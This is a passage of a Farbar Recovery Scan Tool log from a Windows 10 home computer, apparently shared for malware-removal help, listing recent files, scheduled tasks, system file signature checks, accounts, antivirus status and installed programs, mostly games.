2016-02-28 18:04 - 2016-02-28 18:48 - 46525608 _____ (Safer-Networking Ltd. ) C:\Users\Kym\Downloads\spybot-2.4.exe
2016-02-26 06:50 - 2016-02-26 06:50 - 00002378 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-02-26 00:30 - 2016-02-26 06:49 - 00000000 ____D C:\Users\Kym\AppData\Local\Deployment
2016-02-26 00:30 - 2016-02-26 00:30 - 00000000 ____D C:\Users\Kym\AppData\Local\Apps\2.0
2016-02-25 23:16 - 2016-02-25 23:16 - 00000000 ____D C:\Users\Kym\AppData\Roaming\Sun
2016-02-25 23:16 - 2016-02-25 23:16 - 00000000 ____D C:\Users\Kym\AppData\LocalLow\Oracle
2016-02-25 23:16 - 2016-02-25 23:16 - 00000000 ____D C:\Users\Kym\.oracle_jre_usage
2016-02-18 15:04 - 2016-02-18 17:51 - 00000000 ____D C:\Users\Kym\Documents\Kalyani
2016-02-15 19:06 - 2016-02-15 19:06 - 00223232 _____ C:\Users\Kym\Downloads\Archibald Prize 2015 information.pdf
2016-02-15 13:32 - 2016-02-15 13:32 - 00281328 _____ C:\WINDOWS\Minidump\021516-19125-01.dmp
2016-02-13 19:16 - 2016-02-13 19:19 - 00000000 ____D C:\Users\Kym\AppData\Local\FullTiltPoker
2016-02-13 19:06 - 2016-02-13 19:06 - 00000000 ____D C:\Users\Kym\AppData\Roaming\Party
2016-02-13 19:06 - 2016-02-13 19:06 - 00000000 ____D C:\Users\Kym\AppData\Roaming\cef-cache
2016-02-13 19:00 - 2016-02-13 19:00 - 00000683 _____ C:\Users\Public\Desktop\Full Tilt Poker.lnk
2016-02-13 19:00 - 2016-02-13 19:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Full Tilt Poker
2016-02-13 18:11 - 2016-02-13 19:00 - 00877888 _____ C:\Users\Kym\Downloads\PartyPokerSetup.exe
2016-02-13 18:10 - 2016-02-13 18:59 - 73087280 _____ C:\Users\Kym\Downloads\FullTiltSetup.exe
2016-02-13 18:10 - 2016-02-13 18:10 - 00877888 _____ C:\Users\Kym\Downloads\Unconfirmed 937642.crdownload
2016-02-10 23:28 - 2016-01-31 16:25 - 01951872 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-02-10 23:28 - 2016-01-31 16:23 - 02601160 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-02-10 23:28 - 2016-01-31 16:23 - 01420392 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2016-02-10 23:28 - 2016-01-31 16:06 - 01531368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-02-10 23:28 - 2016-01-31 16:04 - 01811360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-02-10 23:28 - 2016-01-31 16:04 - 01180696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2016-02-10 23:28 - 2016-01-31 15:38 - 21873152 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-02-10 23:28 - 2016-01-31 15:33 - 24593920 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-02-10 23:28 - 2016-01-31 15:29 - 11557888 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-02-10 23:28 - 2016-01-31 15:26 - 06787072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-02-10 23:28 - 2016-01-31 15:26 - 03793408 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2016-02-10 23:28 - 2016-01-31 15:25 - 12504576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-02-10 23:28 - 2016-01-31 15:17 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll
2016-02-10 23:28 - 2016-01-31 15:16 - 09889280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-02-10 23:28 - 2016-01-31 15:13 - 04791808 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-02-10 23:28 - 2016-01-31 15:11 - 05156352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-02-10 23:28 - 2016-01-31 15:04 - 00100352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll
2016-02-10 23:28 - 2016-01-31 15:00 - 11263488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-02-10 23:27 - 2016-01-31 16:25 - 01248896 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-02-10 23:27 - 2016-01-31 16:24 - 01824880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-02-10 23:27 - 2016-01-31 16:06 - 01535032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-02-10 23:27 - 2016-01-31 16:06 - 00809336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-02-10 23:27 - 2016-01-31 15:34 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngckeyenum.dll
2016-02-10 23:27 - 2016-01-31 15:33 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\IoTAssignedAccessLockFramework.dll
2016-02-10 23:27 - 2016-01-31 15:29 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasman.dll
2016-02-10 23:27 - 2016-01-31 15:25 - 02237952 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-02-10 23:27 - 2016-01-31 15:25 - 00366592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-02-10 23:27 - 2016-01-31 15:25 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2016-02-10 23:27 - 2016-01-31 15:24 - 00784384 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2016-02-10 23:27 - 2016-01-31 15:24 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2016-02-10 23:27 - 2016-01-31 15:24 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2016-02-10 23:27 - 2016-01-31 15:23 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2016-02-10 23:27 - 2016-01-31 15:22 - 00680448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2016-02-10 23:27 - 2016-01-31 15:20 - 02849792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-02-10 23:27 - 2016-01-31 15:19 - 01602560 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-02-10 23:27 - 2016-01-31 15:19 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkDesktopSettings.dll
2016-02-10 23:27 - 2016-01-31 15:19 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IoTAssignedAccessLockFramework.dll
2016-02-10 23:27 - 2016-01-31 15:18 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-02-10 23:27 - 2016-01-31 15:18 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-02-10 23:27 - 2016-01-31 15:17 - 19324928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-02-10 23:27 - 2016-01-31 15:16 - 00950272 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-02-10 23:27 - 2016-01-31 15:14 - 07525376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-02-10 23:27 - 2016-01-31 15:14 - 03588096 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-02-10 23:27 - 2016-01-31 15:13 - 00123392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasman.dll
2016-02-10 23:27 - 2016-01-31 15:13 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\ztrace_maps.dll
2016-02-10 23:27 - 2016-01-31 15:11 - 00678400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2016-02-10 23:27 - 2016-01-31 15:11 - 00291840 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2016-02-10 23:27 - 2016-01-31 15:11 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-02-10 23:27 - 2016-01-31 15:07 - 18802176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-02-10 23:27 - 2016-01-31 15:06 - 02316800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-02-10 23:27 - 2016-01-31 15:05 - 01380864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-02-10 23:27 - 2016-01-31 15:05 - 00574464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2016-02-10 23:27 - 2016-01-31 15:05 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-02-10 23:27 - 2016-01-31 15:02 - 03580416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-02-10 23:27 - 2016-01-31 15:02 - 00768000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-02-10 23:27 - 2016-01-31 14:59 - 05457408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-02-10 23:27 - 2016-01-31 14:58 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ztrace_maps.dll
2016-02-09 22:56 - 2016-02-09 22:56 - 00281328 _____ C:\WINDOWS\Minidump\020916-19296-01.dmp
2016-02-09 03:29 - 2016-02-09 03:29 - 00001277 _____ C:\Users\Kym\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CNext.lnk
2016-02-09 03:28 - 2016-02-09 03:28 - 00004296 _____ C:\WINDOWS\System32\Tasks\AMD Updater
2016-02-09 03:25 - 2016-02-13 19:16 - 00000000 ____D C:\Users\Kym\AppData\Local\AMD
2016-02-09 03:25 - 2016-02-09 03:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2016-02-09 03:25 - 2016-02-09 03:25 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
2016-02-09 03:20 - 2016-02-09 03:23 - 322471624 _____ (AMD Inc.) C:\Users\Kym\Downloads\radeon-crimson-15.12-win10-64bit.exe
2016-02-08 02:13 - 2016-02-08 02:13 - 00000202 _____ C:\Users\Kym\Desktop\Tom Clancy's Rainbow Six Siege.url
2016-02-03 19:16 - 2016-02-03 19:16 - 06253170 _____ C:\Users\Kym\Downloads\1776 - Donkey Kong Country 2 (U)(Independent).zip
2016-02-03 19:07 - 2016-02-03 19:08 - 11918630 _____ C:\Users\Kym\Downloads\2214 - Donkey Kong Country 3 (E)(Rising Sun).zip
2016-02-03 19:06 - 2016-02-03 19:06 - 02981626 _____ C:\Users\Kym\Downloads\Donkey Kong Country 2 - Diddy's Kong Quest (USA) (En,Fr) (Rev A).zip
2016-02-03 19:04 - 2016-02-03 19:04 - 05642942 _____ C:\Users\Kym\Downloads\1055 - Donkey Kong Country (U)(Evasion).zip
2016-02-02 12:22 - 2016-02-02 12:22 - 00000000 ____D C:\Users\Kym\Documents\MIsc

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-03-01 22:06 - 2014-05-02 21:01 - 00000920 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-03-01 21:42 - 2014-10-12 20:42 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-03-01 20:14 - 2015-12-25 19:32 - 00004144 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{5957CCCD-7167-42EC-BDE9-58F86B871E77}
2016-03-01 17:06 - 2014-05-02 21:01 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-03-01 13:55 - 2014-05-02 22:28 - 00000000 ____D C:\Users\Kym\AppData\Roaming\uTorrent
2016-03-01 12:54 - 2015-08-09 01:28 - 01011482 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-03-01 12:54 - 2015-07-10 21:02 - 00000000 ____D C:\WINDOWS\INF
2016-03-01 12:52 - 2015-07-10 21:04 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-03-01 12:49 - 2014-09-10 20:01 - 00003804 _____ C:\WINDOWS\System32\Tasks\AutoKMS
2016-03-01 12:48 - 2015-08-09 01:48 - 00000000 __SHD C:\Users\Kym\IntelGraphicsProfiles
2016-03-01 12:48 - 2015-08-09 01:27 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-03-01 12:48 - 2015-07-10 22:21 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-03-01 12:48 - 2015-07-10 21:04 - 00000000 ____D C:\WINDOWS\addins
2016-03-01 12:48 - 2015-07-10 19:05 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
2016-03-01 12:19 - 2015-08-09 17:12 - 00000000 ____D C:\Users\Kym\AppData\LocalLow\Temp
2016-03-01 12:19 - 2015-08-09 01:29 - 00000000 ____D C:\Users\Kym
2016-02-29 12:23 - 2015-07-10 21:04 - 00000000 ___HD C:\Program Files\WindowsApps
2016-02-28 17:59 - 2014-05-02 21:43 - 00004280 _____ C:\WINDOWS\System32\Tasks\avast! Emergency Update
2016-02-26 00:31 - 2015-08-09 11:27 - 00000000 ____D C:\Users\Kym\AppData\Local\MicrosoftEdge
2016-02-25 23:54 - 2009-07-14 15:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2016-02-25 23:38 - 2015-04-09 16:31 - 00000000 ____D C:\Users\Kym\Documents\Outlook Files
2016-02-25 23:16 - 2014-10-18 18:59 - 00097888 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2016-02-25 23:16 - 2014-10-18 18:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-02-25 23:16 - 2014-10-18 18:59 - 00000000 ____D C:\Program Files (x86)\Java
2016-02-25 22:43 - 2014-10-18 18:43 - 00000000 ____D C:\AMD
2016-02-19 20:02 - 2015-03-12 22:56 - 00000000 ____D C:\Users\Kym\AppData\Local\Spotify
2016-02-19 20:01 - 2015-03-12 22:54 - 00000000 ____D C:\Users\Kym\AppData\Roaming\Spotify
2016-02-18 21:54 - 2016-01-16 18:56 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2016-02-18 00:33 - 2015-07-10 21:04 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-02-16 19:47 - 2015-07-10 21:04 - 00000000 ____D C:\WINDOWS\rescache
2016-02-16 19:24 - 2014-05-25 16:10 - 00000000 ____D C:\Users\Kym\AppData\Local\ElevatedDiagnostics
2016-02-15 20:11 - 2015-08-09 01:48 - 00000000 ____D C:\Users\Kym\AppData\Local\Packages
2016-02-15 13:32 - 2015-09-27 23:34 - 00000000 ____D C:\WINDOWS\Minidump
2016-02-13 19:10 - 2014-11-20 11:53 - 00000000 ____D C:\Users\Kym\AppData\Local\PokerStars
2016-02-13 13:57 - 2015-07-10 23:14 - 00000000 ____D C:\Program Files\Windows Journal
2016-02-12 19:44 - 2015-08-08 23:54 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013
2016-02-12 19:42 - 2015-07-10 20:55 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-02-12 19:42 - 2009-07-14 12:34 - 00000478 _____ C:\WINDOWS\win.ini
2016-02-12 19:41 - 2014-05-04 15:26 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-02-12 19:37 - 2014-05-04 15:26 - 146614896 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-02-09 03:30 - 2014-09-29 14:52 - 00000000 ____D C:\Program Files (x86)\Raptr
2016-02-09 03:25 - 2015-08-09 01:27 - 00000000 ____D C:\Program Files\AMD
2016-02-09 03:25 - 2015-02-12 08:41 - 00000000 ____D C:\Program Files (x86)\AMD
2016-02-09 03:19 - 2014-09-22 17:29 - 00000000 ____D C:\ProgramData\AMD
2016-02-08 23:26 - 2015-11-28 22:42 - 00000000 ____D C:\Users\Kym\AppData\Local\Ubisoft Game Launcher
2016-02-08 16:30 - 2014-09-02 15:05 - 00000000 ____D C:\Users\Kym\Documents\My Games
2016-02-08 16:17 - 2015-08-09 01:28 - 00000000 ____D C:\ProgramData\Package Cache
2016-02-03 08:47 - 2015-07-10 21:06 - 00828920 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-02-03 08:47 - 2015-07-10 21:06 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-02-02 17:01 - 2014-05-02 21:01 - 00003978 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2016-02-02 17:01 - 2014-05-02 21:01 - 00003746 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2016-02-01 22:21 - 2014-10-03 09:28 - 00000000 ____D C:\Users\Kym\Documents\Bond
2016-02-01 21:47 - 2014-05-02 21:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive

==================== Files in the root of some directories =======

2015-09-08 19:17 - 2015-09-08 19:17 - 0000000 _____ () C:\Program Files (x86)\ATI Technologies
2015-08-14 11:25 - 2015-08-14 11:25 - 0000000 _____ () C:\Program Files (x86)\Common Files\AMD
2014-07-23 14:06 - 2015-02-19 13:45 - 0000953 _____ () C:\Users\Kym\AppData\Roaming\Network Meter_Settings.ini
2014-07-23 17:57 - 2015-08-09 01:04 - 0000028 _____ () C:\Users\Kym\AppData\Roaming\Network Meter_Usage.ini
2014-05-02 20:55 - 2014-08-28 11:18 - 0007599 _____ () C:\Users\Kym\AppData\Local\Resmon.ResmonCfg
2015-06-18 16:22 - 2015-06-18 16:27 - 0000260 _____ () C:\ProgramData\csgobm.project
2015-06-18 16:22 - 2015-06-18 16:27 - 0000002 _____ () C:\ProgramData\csgobm2.project
2015-06-18 16:19 - 2015-06-18 16:19 - 0010299 _____ () C:\ProgramData\csgobmbacked.cfg
2015-06-18 16:19 - 2015-06-18 16:19 - 0000077 _____ () C:\ProgramData\csgobmsettings.ini
2015-08-09 01:27 - 2015-08-09 01:27 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Some files in TEMP:
====================
C:\Users\Kym\AppData\Local\Temp\sqlite3.dll


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-02-29 12:25

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version:27-02-2016
Ran by Kym (2016-03-01 22:12:09)
Running from C:\Users\Kym\Desktop
Windows 10 Home (X64) (2015-08-08 15:48:30)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-788086572-3644745805-1037152649-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-788086572-3644745805-1037152649-503 - Limited - Disabled)
Guest (S-1-5-21-788086572-3644745805-1037152649-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-788086572-3644745805-1037152649-1002 - Limited - Enabled)
Kym (S-1-5-21-788086572-3644745805-1037152649-1000 - Administrator - Enabled) => C:\Users\Kym

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Spybot - Search and Destroy (Enabled - Up to date) {A16C3F68-9280-E053-1818-342707FECF4D}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\uTorrent) (Version: 3.4.5.41712 - BitTorrent Inc.)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.010.20059 - Adobe Systems Incorporated)
Adobe Photoshop CC 2014 (HKLM-x32\...\{D7A4F897-B20A-42D0-862D-CB5F6DB7391D}) (Version: 15.0 - Adobe Systems Incorporated)
Adobe Premiere Elements 11 (HKLM\...\PremElem110) (Version: 11.0 - Adobe Systems Incorporated)
Adobe Premiere Elements 11 (Version: 11.0 - Adobe Systems Incorporated) Hidden
Adobe Reader XI (11.0.13) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.13 - Adobe Systems Incorporated)
AMD Install Manager (HKLM\...\AMD Catalyst Install Manager) (Version: 5.00 - Advanced Micro Devices, Inc.)
Apple Application Support (32-bit) (HKLM-x32\...\{3540ADD5-822B-47FB-B1C2-CD7B2C8E9FEC}) (Version: 4.0.2 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{C9C0FE2C-602E-49D7-8C42-5B9E8FF04798}) (Version: 4.0.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{FD244E19-6EFE-4A2D-948A-0D45D4C168BE}) (Version: 9.0.0.26 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
Arma 3 (HKLM-x32\...\Steam App 107410) (Version: - Bohemia Interactive)
Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 10.2.2218 - AVAST Software)
Awesomenauts (HKLM-x32\...\Steam App 204300) (Version: - Ronimo Games)
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Beyond Gravity (HKLM-x32\...\Steam App 317510) (Version: - Qwiboo Ltd)
BioShock (HKLM-x32\...\Steam App 7670) (Version: - 2K Boston)
BioShock 2 (HKLM-x32\...\Steam App 8850) (Version: - 2K Marin)
BioShock Infinite (HKLM-x32\...\Steam App 8870) (Version: - Irrational Games)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Brother MFL-Pro Suite DCP-J4110DW (HKLM-x32\...\{DD98C438-D769-4677-AA87-3481FA32D20C}) (Version: 2.0.0.0 - Brother Industries, Ltd.)
Catalyst Control Center Next Localization BR (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Clicker Heroes (HKLM-x32\...\Steam App 363970) (Version: - Playsaurus)
Contagion (HKLM-x32\...\Steam App 238430) (Version: - Monochrome LLC)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version: - Valve)
Curse (HKLM-x32\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 6.0.0.0 - Curse)
DayZ (HKLM-x32\...\Steam App 221100) (Version: - Bohemia Interactive)
Diablo III (HKLM-x32\...\Diablo III) (Version: - Blizzard Entertainment)
Dota 2 (HKLM-x32\...\Steam App 570) (Version: - Valve)
Elements 11 Organizer (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
f.lux (HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Flux) (Version: - )
Full Tilt Poker (HKLM-x32\...\{D4C9692E-4EFA-4DA0-8B7F-9439466D9E31}) (Version: 5.44.1.WIN.FullTilt.COM - )
Garry's Mod (HKLM-x32\...\Steam App 4000) (Version: - Facepunch Studios)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
Google Drive (HKLM-x32\...\{EF61675D-9BBC-4EC7-B906-F13BE8D3BD20}) (Version: 1.27.1227.2094 - Google, Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Hearthstone (HKLM-x32\...\Hearthstone) (Version: - Blizzard Entertainment)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version: - Blizzard Entertainment)
IBM SPSS Statistics 23 (HKLM\...\{C3BA73A4-2A45-4036-8541-4F5F8146078B}) (Version: 23.0.0.0 - IBM Corp)
iExplorer 3.6.1.0 (HKLM-x32\...\{7FD8B0C1-CDDA-4B4D-A577-B2E3570EA3A3}_is1) (Version: - Macroplant LLC)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3308 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.0.1016 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.0.19 - Intel Corporation)
Internode Monthly Usage Meter 8.6.3 (HKLM-x32\...\Internode Monthly Usage Meter_is1) (Version: - )
iTunes (HKLM\...\{88509E20-3936-4D88-A1C0-B274C7BB5151}) (Version: 12.3.0.44 - Apple Inc.)
Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation)
Java 8 Update 74 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218074F0}) (Version: 8.0.740.2 - Oracle Corporation)
League of Legends (HKLM-x32\...\League of Legends 3.0.0) (Version: 3.0.0 - Riot Games)
League of Legends (x32 Version: 3.0.0 - Riot Games) Hidden
Left 4 Dead 2 (HKLM-x32\...\Steam App 550) (Version: - Valve)
Logitech G35 (HKLM\...\{27607A94-33AC-4AA7-AACE-95AF6ACA3E30}) (Version: 1.1.178 - Logitech)
Logitech Gaming Software 8.70 (HKLM\...\Logitech Gaming Software) (Version: 8.70.315 - Logitech Inc.)
